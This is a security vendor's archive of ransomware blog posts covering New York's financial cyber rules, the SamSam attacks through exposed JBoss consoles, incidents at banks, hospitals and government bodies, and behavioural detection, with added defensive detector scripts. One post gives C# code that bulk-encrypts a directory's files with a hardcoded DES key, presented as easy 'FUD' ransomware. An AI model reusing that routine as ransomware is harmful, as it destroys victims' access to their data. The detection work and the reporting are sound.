Tag Archives: ransomware

Update: New York State Finalizes Cyber Rules for Financial Sector

When last we left New York State’s innovative cybercrime regulations, they were in a 45-day public commenting period. Let’s get caught up. The comments are now in. The rules were tweaked based on stakeholders’ feedback, and the regulations will begin a grace period starting March 1, 2017.

To save you the time, I did the heavy lifting and looked into the changes made by the regulators at the New York State Department of Financial Services (NYSDFS).

There are a few interesting ones to talk about. But before we get into them, let’s consider how important New York State — really New York City — is as a financial center.

Made in New York: Money!

To get a sense of what’s encompassed in the NYDFS’s portfolio, I took a quick dip into their annual report.

For the insurance sector, they supervise almost 900 insurers with assets of $1.4 trillion and receive premiums of $361 billion. Under wholesale domestic and foreign banks — remember New York has a global reach — they monitor 144 institutions with assets of $2.2 trillion. And I won’t even get into community and regional banks, mortgage brokers, and pension funds.

In a way, the NYSDFS has the regulatory power usually associated with a small country’s government, and therefore the rules that New York makes regarding data security have an outsized influence.

One Rule Remains the Same

Back to the rules. First, let’s look at one key part that was not changed.

NYSDFS received objections from the commenters on their definition of cyber events. This is at the center of the New York law—detecting, responding to, and recovering from these events—so it’s important to take a closer look at its meaning.

Under the rules, a cybersecurity event is “any act or attempt, successful or unsuccessful, to gain unauthorized access to, disrupt or misuse an Information System or information …”

Some of the commenters didn’t like the inclusion of “attempt” and “unsuccessful”. But the New York regulators held firm and kept the definition as is.

A cybersecurity event is a broader term than a data breach. For a data breach, there usually has to be data access and exposure or exfiltration. In New York State, though, access alone or an IT disruption, even when merely attempted (or executed but not successfully), is considered an event.

As we’ve pointed out in our ransomware and the law cheat sheet, very few states in the US would classify a ransomware attack as a breach under their breach laws.

But in New York State, if ransomware (or a remote access trojan or other malware) was loaded on the victim’s server and perhaps abandoned or stopped by IT in mid-hack, it would indeed be a cybersecurity event.

Notification Worthy

This leads naturally to another rule, notification of a cybersecurity event to the New York State regulators, where the language was tightened.

The 72-hour time frame for reporting remains, but the clock starts ticking after a determination by the financial company that an event has occurred.

The financial companies were also given more wiggle room in the types of events that require notification: essentially the malware would need to “have a reasonable likelihood of materially harming any material part of the normal operation…”

That’s a mouthful.

In short: financial companies will notify the regulators at NYSDFS when the malware could seriously affect an operation that’s important to the company.

For example, malware that infects the digital console on the bank’s espresso machine is not notification worthy. But a key logger that lands in a bank’s foreign exchange area and is scooping up user passwords is very worthy.

The NYDFS’s updated notification rule language, by the way, puts it more in line with other data security laws, including the EU’s General Data Protection Regulation (GDPR).

So would you have to notify the New York State regulator when malware infects a server but hasn’t necessarily completed its evil mission?

Getting back to the language of “attempt” and “unsuccessful” found in the definition of cybersecurity events, it would appear that you would but only if the malware lands on a server that’s important to the company’s operations — either because of the data it contains or its function.

State of Grace

The original regulation also said you had to appoint a Chief Information Security Officer (CISO) who’d be responsible for seeing this cybersecurity regulation is carried out. Another important task of the CISO is to annually report to the board on the state of the company’s cybersecurity program.

With pushback from industry, this language was changed so that you can designate an existing employee as a CISO — likely a CIO or other C-level.

One final point to make is that the grace period for compliance has been changed. For most of the rules, it’s still 180 days.

But for certain requirements — multifactor authentication and penetration testing — the grace period has been extended to 12 months, and for a few others — audit trails, data retention, and the CISO report to the board — it’s been pushed out to 18 months.

For more details on the changes, check this legal note from our attorney friends at Hogan Lovells.

Can Our Crystal Ball Hack It? 2017 Varonis Cybersecurity Predictions

Everyone makes predictions at this time of year, but who looks back to check on their accuracy? Let’s have a look at some of last year’s omens before directing our forecast lens to 2017.

Our first prediction for 2016: The U.S. Presidential campaign will be affected by a cyber attack.

We were on to something here, but we should have said numerous attacks. From Wikileaks exposing internal campaign emails to allegations that Russia attempted to affect the outcome, security became a front-and-center issue.

We also predicted: Ransomware damage will double.

We had the right direction but the problem actually became far worse than our modest foreboding (a real kick in the crystal ball). While 2015 saw about $325 million in ransom from CryptoLocker alone, 2016 will likely hit $1 billion in ransomware damages according to the FBI.

Amid the hacked ruins, compromised confidences and costly shakedowns of 2016 is the realization that privacy can never truly be assured for modern communications.

Let’s see what 2017 will bring.

1. Extortionware will be the new lucrative thing.

Ransomware’s more targeted, more difficult and more lucrative cousin will emerge and cause major financial damage because of the sheer size of the payouts demanded when highly sensitive data is threatened with exposure. This will go largely unreported for reasons of discretion, making the prescience of this prediction conveniently unverifiable next year.

2. Ransomware will continue to be a major thing (and backups aren’t enough).

Ransomware will continue to grow in terms of the sheer number and frequency of attacks on organizations. IT best practices for defending against ransomware will expand from backup remediation to early detection and alerting as user behavior analytics become more intelligent and predictive. Stopping an attempted attack – before or right after it starts – is far more efficient and less painful than figuring out which files were affected and restoring them from backup.

3. Threats within will drive the need for smarter security analytics.

Adoption of security analytics will increase as insider threats continue to get CXO and board-level attention. Insiders have legitimate access to systems and data, so preventing initial access is impractical. Detection is the next line of defense, both for employees or contractors who abuse their access and for revealing stolen insider credentials.

4. Goodbye, ads. Hello, blockers.

The use of ad blockers will skyrocket after another major media site becomes a distributor of malware (as Forbes was in 2016) and users take more deliberate command of their own protection against growing malware threats.

5. Weaponizing IoT will become a regular occurrence.

IoT (Internet of Things) devices such as DVRs and security cameras will become more frequent targets for attackers. While the devices themselves may not all contain valuable data, they represent potential stepping stones on a hacker’s path to steal digital assets. The Mirai botnet, capable of some of the biggest attacks yet and able to reach high volumes with minimal ramp-up time, will threaten the adoption of IoT applications as device makers realize they must make security a design principle or lose their markets.

6. You’re hired, Ms. IT Security Candidate.

With $1 trillion predicted to be spent globally on cybersecurity between 2017 and 2021 and more than 200,000 security jobs currently unfilled in the U.S., computer security skills will continue to be the hottest kind in the IT job market in terms of the number of unfilled jobs and the compensation levels.

7. Organizations will need to save users from themselves.

User education on password hygiene and recognizing potential attacks will continue to increase, but the reality will sink in that vigilance alone will not suffice, as phishing and malware become more and more difficult for even careful employees to detect. Organizational remedies that protect employees, customers, partners, and the organizations themselves will become more widespread.

Malware Coding Lessons for IT People, Part II: Fun With FUD Ransomware!

Let’s not overthink ransomware! It’s just a small malicious piece of code with one devious goal — encrypting all of the user’s important files. If the unfortunate victim wants to recover them, he or she will have to pay a hefty amount to retrieve the decryption key.

How hard is ransomware?

In this post, I’ll show you how incredibly easy it is to code a FUD (Fully Undetected) ransomware using public Microsoft libraries with C#.

Ransomware 101

As I discussed in my previous post, there are a few ways to get infected with malware – for starters, malicious attachments, rogue websites, and phishing campaigns, as well as some other creative methods I’ll cover in a future post.

Ok, say we’ve clicked on a malicious ransomware file. What’s going to happen next? Persistency!

Persistency is the code used by the hacker to enable the malware to survive restarts and to disguise it so that it is hard to detect (and remove). While persistency is (usually) generic across many different malware families, there are some unique techniques for ransomware. I’ll get into this in a future post.

At its core, ransomware is just software that performs bulk encryption of the data contents in the victim’s file system. Typically, asymmetric encryption — with different keys for encryption and decryption — is preferred by hackers since it is much harder to recover the data.

This asymmetric scheme is based on the idea of encrypting the file contents with a public key, while decryption requires a different private key that only the attacker holds. You can learn more about asymmetric encryption here: https://en.wikipedia.org/wiki/Public-key_cryptography.

The malware can also choose a weaker encryption method, such as a symmetric encryption algorithm, in which the same key is used for both encryption and decryption.

To make the code even simpler, we will use an API that implements a symmetric encryption algorithm.

And Now the Code

The next part of the software that newbies need to know about is traversing the file system. Essentially, you’re travelling through the directory hierarchy, collecting file pathnames, and then feeding the file contents to the encryption engine. Then, of course, the file has to be written back.

The list of files to be encrypted is usually the ones companies depend on. We’re talking documents, spreadsheets, images, presentations, audio, and emails. By the way, hackers usually will not encrypt movies due to their size and the impact on the malware’s performance. That’s a small consolation—employees can be watching movies while IT is restoring from a backup.

Once the file list is generated after navigating the directories, it’s a good idea to wait for an appropriate time to start the encryption. The idea is to then encrypt as much file content as possible from the list before being detected.

More sophisticated ransomware will attempt to learn the idle time of the infected computer — when there’s CPU available — and slip in the encryption processing at appropriate times to avoid detection.

Enough talk, here’s the code.

First snippet: Choose a random key to encrypt the data with:

    string key = "R?\n??i??";

Basically, you can choose any key you like; remember that we are going to use a symmetric algorithm, so the same key is used for both encrypting and decrypting.

Second snippet: Encrypt an entire directory’s contents:

    // Needs: using System.IO;  (the mili parameter is unused in this snippet)
    private static void EncryptDir(string d, int mili)
    {
        DirectoryInfo dirtoencrypt = new DirectoryInfo(d);
        FileInfo[] file;
        file = dirtoencrypt.GetFiles();
        foreach (FileInfo currentFile in file)
        {
            // Executables are skipped; every other file gets an encrypted ".axx" copy
            if (currentFile.Extension.ToLower() != ".exe")
            {
                string key = "R?\n??i??";
                EncryptFile(currentFile.FullName, currentFile.FullName + ".axx", key);
            }
        }
    }


Third Snippet: The encrypting function, taken directly from MSDN (https://support.microsoft.com/en-us/kb/307010)

    // Namespaces the KB sample relies on:
    // using System.IO;
    // using System.Security.Cryptography;
    // using System.Text;
    static void EncryptFile(string sInputFilename, string sOutputFilename, string sKey)
    {
        FileStream fsInput = new FileStream(sInputFilename, FileMode.Open, FileAccess.Read);
        FileStream fsEncrypted = new FileStream(sOutputFilename, FileMode.Create, FileAccess.Write);

        // DES with the 8-byte key reused as the IV, kept exactly as in the KB sample;
        // DES is long obsolete and reusing the key as the IV is poor practice
        DESCryptoServiceProvider DES = new DESCryptoServiceProvider();
        DES.Key = ASCIIEncoding.ASCII.GetBytes(sKey);
        DES.IV = ASCIIEncoding.ASCII.GetBytes(sKey);
        ICryptoTransform desencrypt = DES.CreateEncryptor();
        CryptoStream cryptostream = new CryptoStream(fsEncrypted, desencrypt, CryptoStreamMode.Write);

        // Read the whole input file and push it through the encryptor
        byte[] bytearrayinput = new byte[fsInput.Length];
        fsInput.Read(bytearrayinput, 0, bytearrayinput.Length);
        cryptostream.Write(bytearrayinput, 0, bytearrayinput.Length);
        // Closing the streams (as in the same KB article) flushes the final block
        cryptostream.Close();
        fsInput.Close();
        fsEncrypted.Close();
    }


That’s it!

A malicious tool with tons of damage potential in less than 100 lines of code and under 10 KB after compiling.
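The flip side of the snippets above is what a monitoring rule has to catch: one account leaving an encrypted ".axx" copy beside every document in a share, fast. The following is an added example (not code from the post and not a Varonis product rule) that replays a constructed file-activity feed and alerts on that pattern; the event format, user names, paths and thresholds are all assumptions.

```python
"""Behavioural ransomware detector over file-activity events.

Added example, not code from the post or from Varonis: it replays a
constructed file-activity feed and alerts when one account creates many
document files carrying an appended extension (report.xlsx -> report.xlsx.axx,
which is exactly what the EncryptDir() snippet above leaves behind) inside a
short time window. Event format, users, paths and thresholds are all assumed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import os

# Extensions ransomware typically targets (documents, images, mail, audio).
DOC_EXTENSIONS = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf",
                  ".jpg", ".png", ".txt", ".msg", ".mp3"}


def parse_event(line):
    """Parse 'ISO-timestamp user action path' (assumed format; path may contain spaces)."""
    ts, user, action, path = line.strip().split(" ", 3)
    return datetime.fromisoformat(ts), user, action.lower(), path


def appended_extension(path):
    """Return the foreign extension bolted onto a document name, or None.

    report.xlsx.axx -> ".axx"; report.xlsx -> None; notes.txt.bak -> ".bak"
    (a legitimate backup tool can look the same, which is why the rule below
    also requires volume inside a window rather than a single hit).
    """
    stem, outer = os.path.splitext(path)
    inner = os.path.splitext(stem)[1].lower()
    outer = outer.lower()
    if inner in DOC_EXTENSIONS and outer and outer not in DOC_EXTENSIONS:
        return outer
    return None


def detect_bulk_encryption(lines, window_seconds=60, threshold=10):
    """Sliding-window rule: alert when one account creates or renames at least
    `threshold` document files with an appended extension within `window_seconds`.

    Returns a list of (user, extension, window_start, count) tuples, at most one
    per user/extension pair so a single burst does not page the on-call team
    hundreds of times.
    """
    window = timedelta(seconds=window_seconds)
    events = sorted(parse_event(line) for line in lines if line.strip())  # replay in time order
    recent = defaultdict(deque)   # (user, ext) -> timestamps still inside the window
    alerted = set()
    alerts = []
    for ts, user, action, path in events:
        if action not in ("create", "rename"):
            continue
        ext = appended_extension(path)
        if ext is None:
            continue
        key = (user, ext)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:          # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((user, ext, q[0], len(q)))
    return alerts


def build_sample_events():
    """Constructed sample feed: bob does normal work on a share; alice's
    workstation rewrites the finance share the way EncryptDir() would."""
    t0 = datetime(2017, 1, 10, 9, 0, 0)
    lines = []
    for i in range(4):   # four ordinary saves spread over 30 minutes
        t = t0 + timedelta(minutes=10 * i)
        lines.append(f"{t.isoformat()} bob write \\\\fs1\\sales\\deal{i}.docx")
    for i in range(12):  # twelve ".axx" copies appear within 22 seconds
        t = t0 + timedelta(minutes=30, seconds=2 * i)
        lines.append(f"{t.isoformat()} alice create \\\\fs1\\finance\\q{i}.xlsx.axx")
    # one stray backup-style file: same shape, but far below the threshold
    t = t0 + timedelta(minutes=31)
    lines.append(f"{t.isoformat()} alice create \\\\fs1\\finance\\notes.txt.bak")
    return lines


if __name__ == "__main__":
    for user, ext, start, count in detect_bulk_encryption(build_sample_events()):
        print(f"ALERT {start.isoformat()} user={user} ext={ext} files={count}")
```

The same rule is what a "thousands of files modified in a minute" alert boils down to: volume of a suspicious shape per account per window, with the single `.bak` file showing why the threshold matters.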

I’ll put together more pieces of the ransomware puzzle in another post.

New SamSam Ransomware Exploiting Old JBoss Vulnerability

One of the lessons learned from the uptick in ransomware attacks is that it pays to keep your security patches up to date. A few months ago the SamSam/Samas malware was (and is still) having great success primarily against healthcare companies and hospitals.

The attack vector, though, was not based on phishing or social engineering. SamSam instead exploits a very old (and surprising) vulnerability in JBoss, Red Hat’s Java-based web server environment.

No Phishing

JMX is the administrative console web app for JBoss — yes, everything starts with a J. Unfortunately, by default, the JMX home page is available externally without any authentication checks.

Like any good admin tool, JMX gives you access to some basic functions including running Java code.

Are you thinking what I’m thinking?

Hackers discovering this JBoss vulnerability quickly realized that if they could upload a simple shell they were on their way to controlling the server.

And that’s the way this exploit works. If you want to read the technical details and the coding involved, you can google on “jboss vulnerability”.

This is a very well-known security hole — the CVE dates back to 2010 — and it has since been patched.

But it has come back into the limelight because the SamSam ransomware has very successfully used it against healthcare orgs, which for whatever reasons are more likely to have JBoss installations.

Once the cyber thieves gain entry through JMX, they upload the ransomware. And start collecting the fees. No phishing required.

How bad is the problem?

According to Cisco security researchers, there could be as many as 3.2 million installations at risk.

Remote Access Trojan by Any other Name

Attackers can find sites that have JBoss by Google dorking, which allows you to search for part of the telltale URL – in this case “jmx-console”—that indicates a JBoss server on an exposed site.


It’s an admin console! It’s a remote access trojan! It’s both!

In looking at the JBoss attack techniques, I saw lots of code where the JMX interface acts as a starting point for uploading and launching other software, say a reverse shell. So the vulnerability leaves open other attacks, not necessarily ransomware.

To put it bluntly, the JMX interface is an unintentional Remote Access Trojan or RAT, which we wrote about in our pen testing series.

Normally the attacker has to first install the RAT, but with these unpatched Red Hat installations it’s there — gasp! — waiting for them.

Maybe it’s a good time now to bring all your systems up to date with the latest security patches — I’m talking to you healthcare orgs!
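While the patches roll out, the exposed console is also easy to see in ordinary web-server logs. As an added example (not from the post), here is a small access-log rule that flags jmx-console requests and grades them by source address and outcome, so an unauthenticated console shows up in monitoring rather than as a ransom note; the log format, address ranges and sample lines are constructed for the example.

```python
"""Access-log rule for exposed JBoss jmx-console requests.

Added example, not from the post: it scans web-server access-log lines for
hits on a jmx-console URL and grades them by source address and outcome, so
an unauthenticated console (the SamSam entry point described above) shows up
in monitoring before it shows up as a ransom note. Log format, address ranges
and sample lines are constructed for the example.
"""
import ipaddress
import re

# Common/combined log format, assumed for the example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Address space we treat as "inside"; anything else is an external client.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_internal(ip):
    """True when the client address falls inside one of INTERNAL_NETS."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def classify(line):
    """Return (severity, ip, method, path, status) for a jmx-console request, else None.

    A 2xx/3xx means the console answered (with no credentials or with valid ones);
    from an external address that is critical either way. 401/403 means the
    console challenged the client, which is what a locked-down install should do.
    """
    m = LOG_RE.match(line)
    if not m or "jmx-console" not in m.group("path").lower():
        return None
    ip, method, path = m.group("ip"), m.group("method"), m.group("path")
    status = int(m.group("status"))
    external = not is_internal(ip)
    if status < 400:
        severity = "CRITICAL" if external else "HIGH"
    elif status in (401, 403):
        severity = "MEDIUM" if external else "INFO"
    else:
        severity = "LOW"
    return (severity, ip, method, path, status)


def scan_access_log(lines):
    """Run classify() over every line and return the non-None results in order."""
    return [hit for hit in (classify(line) for line in lines) if hit is not None]


# Constructed sample: 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges
# standing in for Internet clients; 10.1.2.3 is an internal admin workstation.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Apr/2016:10:15:01 +0000] "GET /jmx-console/ HTTP/1.1" 200 8124
203.0.113.7 - - [12/Apr/2016:10:15:09 +0000] "POST /jmx-console/ HTTP/1.1" 200 512
10.1.2.3 - - [12/Apr/2016:10:20:11 +0000] "GET /jmx-console/ HTTP/1.1" 401 0
198.51.100.5 - - [12/Apr/2016:10:21:00 +0000] "GET /index.html HTTP/1.1" 200 3001
"""

if __name__ == "__main__":
    for severity, ip, method, path, status in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{severity:8} {ip:15} {method} {path} -> {status}")
```

The two CRITICAL hits are the case the post describes: an Internet client was served the console, and the POST that follows the GET is the moment to pull the server off the network and check what was deployed.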


One Take Away from Black Hat 2016: Designer Ransomware!

We had an amazing week at Black Hat 2016. One topic that was on attendees’ minds — besides hacking Jeeps and chip-and-pin technology — was ransomware. A security analysis firm now warns us that ransomware has become more clickable because the thieves are localizing the phish mail.

You should watch the video below for the full interview with an analyst from Sophos.

The key takeaway is that the ransomware designers have learned some marketing tricks from non-criminal enterprises.

These digital bandits know to focus their efforts on richer countries that can afford to pay the ransom and then customize the email contents using very local companies and brands.

So you may receive a nicely crafted email with the name and logo of, say, a utility company or government agency. The hackers have gotten better at working out the location of the victims based on their IP addresses.

With the attackers’ improved powers of “market segmentation”, we’re a long way from one-size-fits-all Nigerian 419 schemes!

You and I could easily spot that the sender of the email containing the malware is phony – see our phish mail post — but the average employee might not.

Of course, your company should be boosting employee security budgets to make it less likely that workers will click on a UPS invoice.

More than that, though, companies should lower their overall risk exposure surface. It just makes sense, as Rob has just pointed out, to limit the files that the attacker can access in the first place.

We’ll be talking more about ransomware next week when we present the results of a custom survey that we’re finishing up.



Banks Secretly and Silently Struggling with Ransomware

“You’re almost certainly not going to hear about successful ransomware attacks on banks,” says Fraud Prevention Expert, Ross Hogan in an interview with Banking Exchange. “It is probably one of the most catastrophic events that a bank could suffer.”


If a financial institution made a public announcement that the firm was infected with ransomware, the brand damage would be irreparable.

Moreover, it could potentially create panic amongst customers, leading to a bank run. Customers might decide to withdraw cash from a financial institution, destabilizing the bank to the point where it runs out of cash and unexpectedly faces bankruptcy. The result of this scenario would be – from an economic standpoint – catastrophic.

And NO ONE wants this to happen.

But we know financial institutions are a target

How? Ransomware does not discriminate.

All it takes is one phishing click or a wrong installation and your computer or your entire network could take a hit. (Listen to our podcast: Journey of a Ransomware Attack)

“They’re not just trying to infect your workstation and lock your files on your workstation; they’re trying to go for any network drive they can find,” says Editor-in-Chief of Cyberheist Stu Sjouwerman. “That’s where the risk is. This is what happened at Presbyterian Hospital in Hollywood.”

Not only has ransomware infected hospitals, but schools, police departments, and city departments – all institutions that we rely on.

The financial industry took note. Last year, the Federal Financial Institutions Examination Council issued a ransomware warning about the frequency and severity of the threat.

What banks can do

Be proactive and learn how you can protect your organization from the inside out:

How Varonis helps financial services stop and prevent ransomware

We’ve been working with organizations from all verticals to prevent ransomware. And here are a few quotes from a few financial institutions that describe their experience with how Varonis helps them stop and prevent ransomware:

  • “Even though we have a state of the art firewall and new antivirus software, neither was able to detect or stop Crypto. Varonis DatAlert not only sent us email alerts when a user got hit by Crypto, but also logged that user out before the virus could do any damage to network shares. That alone justified its cost.” – Southern California Wealth Management Firm
  • “Our endpoint protection had detected the virus on a computer and had appropriately removed the code, but not before it had kicked off the encryption process. The point to note here is that although the endpoint had isolated the problem it wasn’t able to kill the process. Varonis was able to identify the process and then remediate the issue and we can prevent it from happening again.” – A Northwestern Bank
  • “Of all the expensive security products we’ve purchased, DatAlert is the only solution that has done, and is doing, all of the alerting and notification of anomalous behavior, especially ransomware.” – A Major Bank in Western Canada



How to Identify Ransomware: Use Our New Identification Tool

Sadly, ransomware infections are routine enough that IT departments have started to develop standardized procedures for rapidly quarantining infected machines, determining the extent of damage and then attempting recovery operations.

For help with locking off computers performing suspicious actions (like modifying thousands of files in a minute), our DatAlert customers are using custom rules and scripts tied to behaviors. They’re running reports in DatAdvantage to rapidly find exactly which files were touched on which servers. However, until recently Varonis has been unable to help with recovery efforts.

While restoring files from backup is the best recovery option, often you’re still left with files created since the last backup was taken, or, where the infection wasn’t caught promptly, with backups that already contain the files the ransomware encrypted.

If you’re in this situation, you need to:

    1. Identify the strain of ransomware you’ve been hit with.
    2. Locate an unlocking application (if any) for that strain.

To help with both of these recovery tasks, we’ve created a Ransomware Identifier. Enter either the file extension of the ransomware encrypted files, or the name of the ransom note file into the Ransomware Identifier search engine and rapidly get your answers.

Try the Ransomware Identifier Now

Next-Gen Ransomware (Ransomworm!) Gets Deadlier

Ransomware developers have been busy adding more deadly functions to their evil creations. First we heard about DDOS capabilities appearing in modified versions of Cerber.  Now Microsoft reports that a new ransomware variant has the power to spread like a worm.

Known as ZCryptor, it infects other users by dropping an autorun.inf file onto removable media – at a practical level, thumb drives that are attached to laptops, as well as network drives.

In other words, employees who are copying files onto USBs will be unwittingly spreading ZCryptor throughout the office.

Wormy Ransomware

Some are calling this new variant ransomworm. Surprisingly, this is not a new idea in malware history.

The first-ever virus, known as Brain, was essentially DOS-based ransomware that propagated through floppy disks. An infected diskette was made unreadable, and the victims had to call a phone number (in Pakistan) to get “inoculated”.

All the standard prevention and mitigation techniques apply to ZCryptor. Train your staff to identify phish mails, keep up-to-date backups, review access rights of folders, and of course monitor with user behavior analytics software to detect unusual file access.

Varonis UBA vs. ZCryptor

User Behavior Analytics or UBA is a new technology that’s up to the challenge of preventing your files from being taken away from you and ransomed.

Without any configuration, our Varonis UBA threat models spot the signs of ransomware activity — when files are being encrypted — and therefore can stop these attacks without having to rely on a static list of signatures as is the case with conventional virus scanners.

Once detected, a series of automated steps can be triggered to prevent ransomware infections like ZCryptor from spreading.

Worried about ransomware? Learn how Varonis User Behavior Analytics can save you some bitcoins!

3 Malware Stats That Will Annoy You

Earlier this week, it was reported that the Russian police arrested 50 suspected hackers for malware bank attacks. One of the largest arrests of hackers in Russian history, these alleged cybercriminals took over $45 million from banks. This arrest also prevented another potential bank heist that would have netted the cyber thieves $35 million.

While this arrest was a big win, malware like ransomware continues to make headline news with no signs of slowing down.

Here are three malware stats that will make your head spin.

1. First Ransomware to Add DDoS Capabilities to Pester You And Others

Security researchers found a modified version of the Cerber ransomware, which blocks user access and encrypts the data. Afterwards, a second malware binary called 3311.tmp rubs salt into your wounds by launching a DDoS attack that sends large amounts of network traffic out of the infected computer. Ouch!

They also found that even after victims pay the ransom, if they don’t clean up their systems, there’s a good chance the DDoS bot will remain on the infected computer.

Expect this new feature to show up more in the upcoming months.

2. Ransomware Campaign Managers Can Potentially Make $90,000/year

While the average American household brings in a little over $50,000 [1] a year, ransomware campaign managers can potentially make $90,000 [2] a year. Responsibilities of a ransomware campaign manager include recruiting distributors and malware development.

After a distributor is located and signed up with a campaign manager, the distributor is on their own to find victims and gets paid on commission. Typically, a campaign manager will have 10-15 distributors.

On the malware development front, if their code skills are sharp enough, it only requires a commitment of just a few hours a week.

Ransomware criminals can just sit back and watch the money flow in. For now, cybercrime pays well.

3. 93% of All Phishing Emails Are Now Ransomware

Since ransomware is easy to send and also offers a quick ROI, according to a new report, the free market has responded: 93% of all phishing emails now contain ransomware.

Should an employee accidentally fall for a phish email, how can you prepare?

A recent Varonis poll of IT professionals found that those infected by ransomware reported that the biggest change to their existing plans after the attack was to increase security education for employees.


[1] https://en.wikipedia.org/wiki/Household_income_in_the_United_States

[2] http://www.csoonline.com/article/3078063/security/top-ransomware-campaign-managers-stand-to-make-90k-annually.html

Hospital Paid Ransom, Didn’t Get All Files Back

Last week, a hospital based in Wichita, Kansas was hit with ransomware.

Yes, the hospital paid the ransom in hopes of getting back to business as soon as possible, but the payment only partially decrypted their files. Instead, the cybercriminals demanded more money to decrypt the rest.

The hospital refused to pay a second ransom because it was no longer “a wise maneuver or strategy.”

President Greg Duick, MD declined to say how much money the Kansas hospital paid, only that it was “a small amount.”

This Kansas hospital is not alone in their struggle. According to Healthcare IT News, more than half of hospitals in their poll were hit with ransomware in the last 12 months.

The Wichita hospital had a plan for this type of attack, but it couldn’t stop ransomware from happening. Brendan FitzGerald, HIMSS Analytics Research Director for Advisory Solutions, said that 73% of the health systems they surveyed also have a business continuity plan in place. Unfortunately, if ransomware hits, the plans might not be enough.

If the best laid plans aren’t sufficient, what do hospitals need to do the most? A recent Varonis poll of healthcare IT professionals provides an answer: those infected by ransomware reported that the biggest change to their existing plans after the attack was to increase security education for employees.

You’re in luck!

We are delighted to offer this free video training course with noted security researcher Troy Hunt, who covers everything you need to know about ransomware.

Also, our ransomware guide for hospitals is worth your while.

How has Ransomware Impacted the US Government?

Ransomware crimes have been soaring this year. It has stalled the operations of not only hospitals and businesses, but also the US government – federal, state and local governments, law enforcement agencies and even schools.

How has the government reacted to this rising threat?

It’s been a challenge. Protecting a government’s digital assets has been time-consuming as threats constantly evolve and become even more sophisticated.

CIO Rami Zakaria of California’s Sacramento County said that he has four people who dedicate much of their time responding to potential threats and breaches.

He advised, “This is the new reality. You have to invest in information security.”

Part of that investment means backing up your data. Some IT professionals have said that because they have a backup, they won’t have to pay the ransom. But once you add time, effort, upgrades, restoration, cleanup, etc., recovery is a type of payment in itself, and one that has impacted government operations.

How are the different branches of government paying? We broke it down, starting with the state, local and education agencies.

Ransomware twice as likely to hit State, Local and Education (SLED)

In 2014, thirty-five state and local governments reported problems with ransomware. [1] While this number isn’t huge, it’s not insignificant either: that same year, an attacker demanded $800,000 from the city of Detroit after infecting some of its computer files. However, the city didn’t pay because the encrypted data was stale.

And by 2015, according to a new report on state and local government and education (SLED) networks, 67% of government networks and 72% of education networks triggered critical malware or ransomware alerts, compared to just 39% of non-SLED networks triggering similar alerts.

The same report also said that SLED networks are nearly twice as likely to be infected with malware or ransomware and four times more likely to be infected with Cryptowall.

Earlier this year, ransomware infected a New Jersey school district’s “entire operations from internal and external communications to its point-of-sale for school lunches. It also prevented any students from taking the scheduled exams, which are entirely computerized.”

The school district didn’t pay the ransom and announced, “Encrypted files were restored from backup to their original state. Servers were restored to remove any trace of the malware. Email and other systems are being restored as quickly as possible.”

However, another district paid the $8,500 ransom because more than 40,000 teachers and students relied on the servers, and the district thought that the amount wasn’t a lot for what the data is worth. They did say that paying more might not be an option.

The Federal Government’s Battle with Ransomware

While SLED has been struggling with ransomware, it appears that the federal government has been as well.

The Department of Homeland Security stated that in 2015, over 300 ransomware-related incidents affected 29 different federal networks. However, the Department is not aware of any instances in which federal agencies paid the ransom. Where government systems were confirmed to be infected with ransomware, the majority of infections affected end-user workstations. In all cases, the system was removed from the network and replaced with a clean one.

Despite the federal government’s efforts to thwart ransomware, the fight continues.

Earlier this month, the House of Representatives technology service desk reportedly warned representatives of increased ransomware attacks on the House network. A spokesperson for the House Chief Administrative Officer declined to confirm whether or not the attacks were successful, and it’s not clear whether any ransom was paid.

What they did confirm was that a ransomware attack on the House would have a similar impact to one on any other large organization and would disrupt government operations. Such an attack could lock down draft bills, memos, emails and sensitive information.

Technologies that Stop Ransomware

To protect federal agencies against ransomware, the National Cybersecurity and Communications Integration Center has been using the EINSTEIN 3 Accelerated (E3A) system, which is designed to detect and block cyberattacks from compromising federal agencies.

However, according to a Government Accountability Office (GAO) report, EINSTEIN has limits. It comes up short because it relies on known signatures, which leaves it vulnerable to new strains of ransomware.

“It doesn’t do a very good job in identifying deviations from normal network traffic,” said Gregory Wilshusen, the GAO director of information security issues who co-authored the audit of the Department of Homeland Security’s National Computer Protection System, which includes Einstein.

CIO magazine also warned, “… while a signature-based approach reduces the performance hit to the systems on which it runs, it also means somebody has to be the sacrificial sheep. Somebody has to get infected by a piece of malware so that it can be identified, analyzed and other folks protected against it. And in the meantime the malefactors can create new malware that signature-based defenses can’t defend against.”

If a signature-based approach isn’t working, what technologies are being implemented to stop ransomware?

Security expert and founder of Bleeping Computer Lawrence Abrams recently wrote that “behavior detection is becoming the best way to detect and stop ransomware as signature detections have become easily bypassed.”

Behavior detection technology is also known as User Behavior Analytics (UBA), and it’s quickly becoming the best ransomware prevention measure.

UBA compares what users on a system normally do (their activities and file access patterns) against the non-normal activities of an attacker who’s stolen internal credentials.

First, the UBA engine monitors normal user behavior by logging each individual user’s actions: file access, logins, and network activities. Then, over time, UBA derives a profile that describes what it means to be that user.

So when a thousand “file modify” actions happen in a short period of time, your IT admin will be notified.
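As an added example (not code from the original post or from any UBA vendor), here is the profile-then-alert logic just described in miniature: a per-user baseline of “modify” events per sliding window is learned from normal activity, and an alert fires when a user’s windowed count far exceeds it. The audit-log format, user names, paths, window and thresholds are all constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # trailing window over which "modify" events are counted

# Constructed "normal" audit log to learn baselines: alice edits one file
# every five minutes; bob reads one file and edits one.
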